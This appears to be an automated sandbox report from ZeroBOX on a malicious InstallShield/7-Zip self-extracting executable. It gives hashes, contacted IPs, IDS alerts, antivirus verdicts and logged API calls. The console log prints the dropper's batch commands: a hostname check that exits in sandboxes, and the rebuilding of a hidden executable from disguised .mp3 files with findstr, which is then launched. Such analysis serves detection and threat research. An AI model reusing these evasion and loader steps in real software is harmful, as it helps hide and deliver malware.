Summary | ZeroBOX

file5.exe

Malicious Library OS Processor Check PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6401 May 27, 2021, 9:29 a.m. May 27, 2021, 9:41 a.m.
Size 968.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
MD5 c6409dcd1888eed5d528f85c21b89162
SHA256 9f6eb963b28951006fa6254b74f58b087c4469496c8ab22cf74210510f82c186
CRC32 9EC637D5
ssdeep 24576:m9btxEOeavmxQyis4IY417H6SreppXHxGKklCOjkx:mNNeauxblYSyNxw8Kkx
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library

IP Address Status Action
104.26.13.31 Active Moloch
157.90.238.247 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49220 -> 104.26.13.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 157.90.238.247:43252 -> 192.168.56.101:49219 2221010 SURICATA HTTP unable to match response to request Generic Protocol Command Decode

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49220
104.26.13.31:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Set aoSCTEs=%userdomain%
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Set //String2//=DESKTOP-QO5QU33
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The syntax of the command is incorrect.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: if %aoSCTEs%==%//String2//% exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: <nul set /p = "MZ" > Ammirabile.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: findstr /V /R "^VHxFkTKzklMPCtSumZgtoIXuqMkLYwTAlnvenkTAxMprPQZQFATAsmxjKhFmHYcpskFtHQHguOKvmUspMxuniapKtlskGzSvdqLDlVoPSFxCPXNQWcNjSWw$" Divino.mp3 >> Ammirabile.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: copy Pei.mp3 o
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start Ammirabile.exe.com o
console_handle: 0x00000007
1 1 0
packer Armadillo v1.71
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74242000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74242000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74242000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13726912512
root_path: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Temp\7ZipSfx.000\Ammirabile.exe.com
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\cmd < Sue.mp3
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd
parameters: /c C:\Windows\system32\cmd < Sue.mp3
filepath: C:\Windows\System32\cmd
1 1 0
section {u'size_of_data': u'0x0001d600', u'virtual_address': u'0x00023000', u'entropy': 7.12576526719866, u'name': u'.rsrc', u'virtual_size': u'0x0001d4fa'} entropy 7.1257652672 description A section with a high entropy has been found
entropy 0.507559395248 description Overall entropy of this PE file is high
host 157.90.238.247
Bkav W32.AIDetect.malware2
ESET-NOD32 a variant of Win32/Packed.7Zip.T
APEX Malicious
Kaspersky UDS:Backdoor.Win32.Agent
FireEye Generic.mg.c6409dcd1888eed5
Jiangmin Trojan.Generic.dmbkj
Webroot W32.Adware.Gen
Microsoft Trojan:Win32/Wacatac.B!ml
eGambit Unsafe.AI_Score_99%
BitDefenderTheta Gen:NN.ZexaF.34692.8q3@aqg6ogdk